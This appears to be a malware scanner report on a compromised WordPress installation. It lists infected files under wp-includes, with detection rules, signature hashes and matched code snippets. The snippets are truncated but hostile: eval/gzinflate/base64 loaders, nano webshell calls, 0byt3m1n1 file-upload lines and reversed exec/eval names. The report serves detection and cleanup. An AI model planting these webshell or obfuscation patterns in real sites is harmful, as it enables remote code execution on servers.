/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/media/index.php Size: 76.62 kB Created: 2022-07-03 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 8
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xguSAEPeJHShBCkZzcykBesqf357vYG/...
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(gzinflate(base64_decode('TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xgu...
| Exploit hex_char Line: 39 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5F
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
| Sign 237750ea Line: 39 Dangerous Malware Signature (hash: 237750ea) | <?php \x65\x76\x61\x6C
| Sign 58cb6644 Dangerous Malware Signature (hash: 58cb6644) | <?php <?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PH...
| Sign 7830f7a6 Line: 39 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0Yx
| Sign 8000b2f1 Line: 38 Dangerous Malware Signature (hash: 8000b2f1) | <?php <?php
eval("\x65
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php
eval
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/paste/item.php Size: 8.47 kB Created: 2022-05-03 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code2 Line: 75 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp,$_POST['src'])
| Sign 2b3f81c9 Line: 46 Dangerous Malware Signature (hash: 2b3f81c9) | <?php 0byt3m1n1
| Sign d97f004d Line: 111 Dangerous Malware Signature (hash: d97f004d) | <?php ZeroByte
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/textcolor/function.php Size: 3.06 kB Created: 2021-11-11 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 7
| Description | Match |
|---|
Exploit hex_char Line: 50 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5F
| Exploit nano Line: 56 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $arr[9]($arr[10])
| Exploit nano Line: 65 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $arr[9]($arr[2])
| Exploit nano Line: 66 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $arr[9]($arr[11])
| Exploit nano Line: 67 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $arr[9]($arr[5])
| Exploit nano Line: 68 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $arr[9]($arr[6])
| Sign 43b0d90f Dangerous Malware Signature (hash: 43b0d90f) | <?php edoced_46esab
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/wpeditimage/index.php Size: 72.53 kB Created: 2022-03-16 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 4 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'f/v9t7/z/f9/zGtJW3Sy/PfW4KgqkB11x3myNiRGe7x4w/EtYkJNJQMKOlgTdFQryrgusfC8OZkkzuDffQ2+AnOkSBiDCCiAde9GBKAN3vsEg5NugWRYQXt/gEHJ2wA60UXGnC8Ei/kB4REh+lHBryi07GUDnRAX78YFkh2BetVVg78GmBjp+Ad2yxCRPQDee2BLHeh5JLRWVZrHG/Q7botAFRfKqvinBJnxexAfIefcdgHVqUVRSjoXSC4gAn2ngkMMgWTXlGwUWRAaewDn2V0cJVLwaKe5SKjn55x0kuNHFAXiv8trm/scOiCY6UebYcNaISA/DgcNIRUftHwqCh7G2g9J1hVYCCYAc9suDtIqUNrGeChEeAWS+i+O8nBCbOqObOmBQTOq7OFxICaZxBxHPllBJjBQfMmUg0+cP6KovwJIXfIIFIB4EVUj94FgBwFoBwB5girB3VowJo16sk8fIninFrJtTiqcB4apV3SNMUmaqmF...
| Exploit concat Line: 38 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O3248.$O5413.$O6248.$O5759.$O2730.$O8535.$O7859.$O9687.$O5759.$O7691.
| Exploit concat_vars_with_spaces Line: 38 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $O7859.$O9687.$O5759.$O7691.$O1505.$O9687.
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($O1271($O2203($O9644('f/v9t7/z/f9/zGtJW3Sy/PfW4KgqkB11x3myNiRGe7x4w/EtYkJNJQMKOlgTdFQryrgusfC8OZkkzuDffQ2+AnOkSBiDCCiAde9GBKAN3vsEg5NugWRYQXt/gEHJ2wA60UXGnC8Ei/kB4REh+lHBryi07GUDnRAX78YFkh2BetVVg78GmBjp+Ad2yxCRPQDee2BLHeh5JLRWVZrHG/Q7botAFRfKqvinBJnxexAfIefcdgHVqUVRSjoXSC4gAn2ngkMMgWTXlGwUWRAaewDn2V0cJVLwaKe5SKjn55x0kuNHFAXiv8trm/scOiCY6UebYcNaISA/DgcNIRUftHwqCh7G2g9J1hVYCCYAc9suDtIqUNrGeChEeAWS+i+O8nBCbOqObOmBQTOq7OFxICaZxBxHPllBJjBQfMmUg0+cP6KovwJIXfIIFIB4EVUj94FgBwFoBwB5girB3VowJo16sk8fI...
| Function str_rot13 exec_str_rot13 Line: 38 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php rKRp
| Sign 84abfe10 Line: 38 Dangerous Malware Signature (hash: 84abfe10) | <?php $O3248.$O5413.$O6248.$O5759.$O2730.$O8535.$O7859.$O9687.$O5759.$O7691.$O1505.$O9687.
| Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454) | <?php VJAG
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/wpemoji/index.php Size: 25.82 kB Created: 2022-06-16 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/wpgallery/function.php Size: 31.56 kB Created: 2022-01-20 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 9 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxCR3BCvfdIHB...
| Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(Ccll("5b3Zdhu5EiD4Ln8FnKWqJMskRVJL2aQoW9Ziy4vk0uLdzUomk2RaJJOVmdRilV7nE+6Z6e5z+szjvMzL/EF/wXzD/ZGJCCyJ3EjKrjv3ntNVxzYTCAQCASAQAAIRjMF/91ZWyrH/3lmhPXDHfXbpdIKBMxzej+ffc3sFy/et6/a5c912rtwgDArmpShllpbbb45OTovFm3tLy+FowlpsuX2yd/x27/iTyf9tH26/3jO/VKL0N8/fwO9X+5BofB4bFY7jkzmxgsD80mRPRpY7LJihE4RP8C/8rNjeyCwx0/e8EP7FuopNtrLC9rpuyDyfdZ2hEzr3792mmgj/vQHMl57fLWf9d2/5n//4b0C4Ue2tdTvOavXR6trD32oPnfraRm9tfWOj0+n8trFRrRvNlZV5MIjsfwdkoT91mvjx3+HDPDvdLz806fu/4ve+O3SC19aYJ/0fkDTqrhciDj0/PX3TPoOv9vazvcNT80uxC...
| Sign e996cf12 Line: 3 Dangerous Malware Signature (hash: e996cf12) | <?php $DEV=gzinflate(base64_decode($DEV));
for($i=0;$i<strlen($DEV);$i++)
{
$DEV[$i] = chr(ord($DEV[$i])-1);
}
return $DEV;
}eval(Ccll(
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/themes/inlite/index.php Size: 14.30 kB Created: 2022-02-18 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 13
| Description | Match |
|---|
Exploit nano Line: 108 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[9]("{$Jd}/{$F1}")
| Exploit nano Line: 39 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[6]($yf)
| Exploit nano Line: 57 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[1]()
| Exploit nano Line: 66 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[17](JD($_GET["n"])
| Exploit nano Line: 71 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[4]("/(\\\\|\\/)
| Exploit nano Line: 77 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[12]($BL)
| Exploit nano Line: 81 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[12]("{$Jd}/{$_POST["n"]}")
| Exploit nano Line: 84 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])
| Exploit nano Line: 87 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[16]($Jd . '/' . jD($_GET["n"])
| Exploit nano Line: 90 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[18]($c8[14]($Jd . '/' . jD($_GET["n"])
| Exploit nano Line: 91 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[13]($Jd . '/' . jD($_GET["n"])
| Exploit nano Line: 94 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[18]($c8[14]($Jd . '/' . jd($_GET["n"])
| Sign 5470607c Line: 63 Dangerous Malware Signature (hash: 5470607c) | <?php ]} ({$_SERVER[
|
|
/custdata02/turtle/public_html/wp-includes/install.php Size: 14.37 kB Created: 2021-12-01 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit align Line: 1 Warning Code alignment technique is usually used for the obfuscation of malicious code | <?php ;$l1JVj4DD=$l14DhMR($l1k)
| Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "b66b6bb9bb66bb669b6b69bbbb6b69b666b6bb9b66666bb69b6bb9bbbbbb9bbb666b9bb6b669b6b6bbb9bbbb66bb69b69bb6bb69b6b6b66669b66bbb6bb9bbbbb6b9bbb6b69b66669b666b66b9b66bb6b69bbb6b66669b66b9bb66b69b6bb6bbbb9bbbbb69bbbb666b9bbbb6bbb9b666b69bbb6bb9bbbbbb669bbb669b66bbb6b9bb6bb666b9bbb6b66b9bb6b666b69bb66b6b9bbb6b6b669bb6bbbb9b6bb6b9b66666b9b666bb6669b6b66b6b69b666bbbbb9b6b6bbb669bb6b66b9bbbb6b6b9b66b6669b66666bb9bbbb66b69b6b6bbb69bbbb6b9b6666bb69b6bb66bbb9b6b6b6b"
| Exploit reversed Line: 1 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions | <?php ecalper_rts
| Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php cexe
| Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f) | <?php edoced_46esab
|
|
/custdata02/turtle/public_html/wp-includes/index.php Size: 6.97 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/public_html/wp-includes/sodium_compat/src/Core/Poly1305/index.php Size: 59.83 kB Created: 2022-04-03 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 4 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'B/9/7/vv+f8/0IZz8hR+qZBNt/PMclswFbY5R1EXiEwKMS9wqucGe9191KNlEh75kfqFH7tUjvb5Z22n+DTkGtMZ8Bv3zx+/5QYwbaK6Tpv6/eJAfAfg6gkIDpPwV6bgYMOi8M31Zsd4JHnx36OyQUP9G5xb6zb380ch+Y/WjsV7ycEkAFGzp6sFIAwEgLIbCe6gk8BMGmLcHOKMGmSqBELt9YNarV/c99F6EEk/MDbCrWG4BUV4Z5QEF/mCTjNe8DusDSK+1UwOAC/QN2/5c8TwCbpmgNe3s/acCgCqH8wQJIJdJ4KXq72AJys71B3v4lToP97/BWDiSZ2t/R+vA0AZALAM2gk2VVSgodVA/gvkG1v34VVREi0kkAfrqq1QSOoaV5XqqmpbW7WUQBS9gSUH3z4MHu0oL89NG9oR0iHqUYWCE/MBifeorxPrenBj0/e/isXhT6UKwCYAQ6UQAUiwPwAKuVcoGQGAN7vL7eNdiBLtW+3...
| Exploit concat Line: 38 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.
| Exploit concat_vars_with_spaces Line: 38 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $O9705.$O2275.$O4387.$O0763.$O8797.$O2275.
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($O3361($O6447($O7244('B/9/7/vv+f8/0IZz8hR+qZBNt/PMclswFbY5R1EXiEwKMS9wqucGe9191KNlEh75kfqFH7tUjvb5Z22n+DTkGtMZ8Bv3zx+/5QYwbaK6Tpv6/eJAfAfg6gkIDpPwV6bgYMOi8M31Zsd4JHnx36OyQUP9G5xb6zb380ch+Y/WjsV7ycEkAFGzp6sFIAwEgLIbCe6gk8BMGmLcHOKMGmSqBELt9YNarV/c99F6EEk/MDbCrWG4BUV4Z5QEF/mCTjNe8DusDSK+1UwOAC/QN2/5c8TwCbpmgNe3s/acCgCqH8wQJIJdJ4KXq72AJys71B3v4lToP97/BWDiSZ2t/R+vA0AZALAM2gk2VVSgodVA/gvkG1v34VVREi0kkAfrqq1QSOoaV5XqqmpbW7WUQBS9gSUH3z4MHu0oL89NG9oR0iHqUYWCE/MBifeorxPrenBj0/e/isXhT6UKwCYAQ6UQAUiwP...
| Sign 84abfe10 Line: 38 Dangerous Malware Signature (hash: 84abfe10) | <?php $O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.$O8797.$O2275.
|
|
/custdata02/turtle/public_html/wp-includes/themes.php Size: 19.76 kB Created: 2024-02-29 05:56:20 Modified: 2024-06-01 08:12:25 Warns: 3 Dangers: 16
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtweGIyZ3FMMEJ6WlhOemF...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "PD9waHAgaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOyAvKilPY0AqViFyVzVHakk3Ki9Ac2V0X3RpbWVfbGltaXQvKktoclVUTG5KdyhQKEQ4dUAqLygwKTsNCi8qR3E1NEBHWEJDNnIhOTRqRUoqL0BlcnJvcl9yZXBvcnRpbmcvKnluNEZ5dkpkSGE2aUg9NTdTZSovKDApOw0KLyppQ01OaEJtVUk1QzYwOGlIKi9AaWdub3JlX3VzZXJfYWJvcnQvKktGbTJGMU5uVyQ4UERJKi8oMSk7DQovKiNTOUhMTkpxb2gqL0BzZXNzaW9uX3N0YXJ0LyomTyY0K29VNVdGbFQqLygpOw0KLyo1cENMdUZCZUp2YVNqKi9pbmlfc2V0LyphdVJhQHQ3TEFmNEE9YmFTMiovKCdkaXNwbGF5X2Vycm9ycycsICdPZmYnKTsNCmlmICgvKipCNm5...
| Exploit eval_base64 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtw...
| Exploit eval_comment Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval/*-?$HA&E6rXuP?}D6O_zDm;`>F6i~-oO?{Xp[b<{`@Ou0AdX1NwbIQ^T[V-*/(/*-MH-,Q_;!]-*/base64_decode/*-=db{C-*/(/*-1)
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtw...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(base64_decode("ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QXZLaWxQWTBBcVZpRnlWelZIYWtrM0tpOUFjMlYwWDNScGJXVmZiR2x0YVhRdktrdG9jbFZVVEc1S2R5aFFLRVE0ZFVBcUx5Z3dLVHNOQ2k4cVIzRTFORUJIV0VKRE5uSWhPVFJxUlVvcUwwQmxjbkp2Y2w5eVpYQnZjblJwYm1jdktubHVORVo1ZGtwa1NHRTJhVWc5TlRkVFpTb3ZLREFwT3cwS0x5cHBRMDFPYUVKdFZVazFRell3T0dsSUtpOUFhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUXZLa3RHYlRKR01VNXVWeVE0VUVSSktpOG9NU2s3RFFvdktpTlRPVWhNVGtw...
| Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>".base64_decode
| Sign 162cf671 Dangerous Malware Signature (hash: 162cf671) | <?php hUVFBfVVNFUl9BR0VOV
| Sign 7186bb8d Dangerous Malware Signature (hash: 7186bb8d) | <?php RfUkVRVUVTV
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php Nsb3Nl
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php jbG9zZ
| Sign 7f5d33bf Line: 1 Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign 91535293 Dangerous Malware Signature (hash: 91535293) | <?php lY2hv
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php c3RyX
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php Z1bmN0aW9u
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign de12c454 Dangerous Malware Signature (hash: de12c454) | <?php vcGVu
|
|
/custdata02/turtle/public_html/wp-includes/function.php Size: 6.11 kB Created: 2024-06-04 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit align Line: 1 Warning Code alignment technique is usually used for the obfuscation of malicious code | <?php $l1oLE8=$GLOBALS["bbb"]($l1w);$l1R1=$l1n($l1oLE8["host"],isset($l1oLE8["port"])
| Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php cexe
| Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f) | <?php edoced_46esab
|
|
/custdata02/turtle/public_html/wp-includes/plugin.php Size: 29.94 kB Created: 2022-03-03 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 2
| Description | Match |
|---|
Function strrev eval_strrev Line: 594 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
| Sign 963e968a Line: 552 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/public_html/wp-includes/defaults.php Size: 25.30 kB Created: 2021-10-30 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp, $_POST["src"])
| Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp, $_POST["\163\162\x63"])
